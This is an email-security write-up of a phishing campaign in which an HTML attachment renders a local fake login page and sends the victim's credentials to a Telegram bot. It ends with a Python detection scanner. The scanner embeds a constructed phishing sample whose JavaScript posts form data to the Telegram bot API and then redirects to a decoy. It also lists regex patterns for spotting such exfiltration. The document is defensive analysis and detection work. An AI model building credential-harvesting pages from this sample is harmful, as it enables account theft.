HTML Attachment Renders Local Phishing Page and Exfiltrates Credentials via Telegram
Attack Overview
Step 1: Email
The attack starts with an email containing an HTML attachment and a vague message referencing a remittance payment. There are no links in the body of the message—only a single attachment: SWIFT_COPY.html.

- Email passes SPF, DKIM, and DMARC checks.
- Message contains no suspicious links.
- A single HTML attachment is used to initiate the attack.
Step 2: Local Phishing Interface
Opening the HTML file launches a local web page mimicking a document-sharing login prompt. The page is rendered entirely on the user’s device, so no network request is generated that network-based detection could observe.

- The page mimics a legitimate login interface.
- Operates without external content or requests.
- Target is prompted to enter email and password.
Step 3: Redirection + Exfiltration via Telegram
After the target submits their credentials, they are redirected to a decoy OneDrive page hosting a harmless PDF. Meanwhile, their credentials, IP address, and geolocation are silently sent to a Telegram bot via the Telegram API.

- Target lands on a decoy file download page.
- Credentials and metadata are exfiltrated covertly.
- Telegram is used as the exfiltration channel.
How Does This Attack Bypass Email Defenses?
This email attack bypasses traditional security solutions for several reasons, including:
- The HTML file is rendered locally and does not generate external requests.
- The attachment appears benign and contains no links or malware.
- Exfiltration occurs via Telegram API, a legitimate communication platform.
How Did Abnormal Detect This Attack?
This attack was detected using AI and ML by analyzing various factors, including:
- Sender behavior and email context anomalies.
- Attachment analysis that revealed HTML smuggling techniques.
- NLP flagged the vague financial message as a phishing indicator.
By learning established normal behavior and detecting these abnormal indicators, a modern email security solution can prevent this attack from reaching inboxes.
Please note the exact detection mechanism from Abnormal Security's system might include proprietary techniques and methodologies not disclosed here.
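As an added illustration of the attachment analysis described above (example code written for this page, not Abnormal Security's detection logic), the following Python scanner looks for the traits this attack combines in one HTML file: a credential form, no externally loaded resources (rendered locally), a reference to the Telegram bot API, base64 decoding, and a client-side redirect. Both HTML samples are constructed stand-ins, not the real SWIFT_COPY.html, and the scoring thresholds are assumptions.

```python
import re

# Indicator patterns over the attachment text. Each one alone is common in legitimate HTML;
# the combination is what characterises a locally rendered credential phish with Telegram exfil.
INDICATORS = {
    "password_field": re.compile(r"<input[^>]*type\s*=\s*[\"']?password", re.I),
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot", re.I),
    "base64_decode": re.compile(r"\batob\s*\(|fromCharCode", re.I),
    "client_redirect": re.compile(r"(window\.)?location(\.href)?\s*=|location\.replace\s*\(", re.I),
    "form_submit_hook": re.compile(r"onsubmit|addEventListener\s*\(\s*[\"']submit", re.I),
}
# Tags that would pull content from the network; their absence is the "renders locally" trait.
EXTERNAL_LOAD = re.compile(r"<(?:script|img|link|iframe)\b[^>]*\b(?:src|href)\s*=\s*[\"']https?://", re.I)

# Constructed sample mimicking the described attachment (placeholder token, no real endpoint).
PHISH_SAMPLE = """<html><body>
<form id="f"><input type="email" name="email"><input type="password" name="pw"></form>
<script>
document.getElementById('f').onsubmit = function(e){
  e.preventDefault();
  fetch('https://api.telegram.org/bot' + atob('placeholder') + '/sendMessage', {method:'POST'});
  window.location = 'https://onedrive.live.com/decoy-placeholder';
};
</script></body></html>"""

# Constructed benign sample: a plain notification that loads a logo but captures nothing.
BENIGN_SAMPLE = """<html><body><p>Your invoice is attached.</p>
<img src="https://example.com/logo.png"></body></html>"""


def analyze_html_attachment(html: str) -> dict:
    """Return the matched indicators, a simple score and a verdict for one HTML attachment."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(html)]
    if "password_field" in hits and not EXTERNAL_LOAD.search(html):
        hits.append("self_contained_credential_form")  # Step 2 trait: no external requests
    score = len(hits)
    # Credential capture plus a covert exfil channel is the decisive pairing from Step 3.
    if ("password_field" in hits and "telegram_bot_api" in hits) or score >= 4:
        verdict = "likely_credential_phish"
    elif score >= 2:
        verdict = "review"
    else:
        verdict = "benign"
    return {"indicators": hits, "score": score, "verdict": verdict}


if __name__ == "__main__":
    for label, sample in (("phish", PHISH_SAMPLE), ("benign", BENIGN_SAMPLE)):
        print(label, analyze_html_attachment(sample))
```

A real pipeline would also decode HTML smuggling wrappers (base64 blobs written into the document at load time) before applying these patterns, since the attributes above may only appear after decoding.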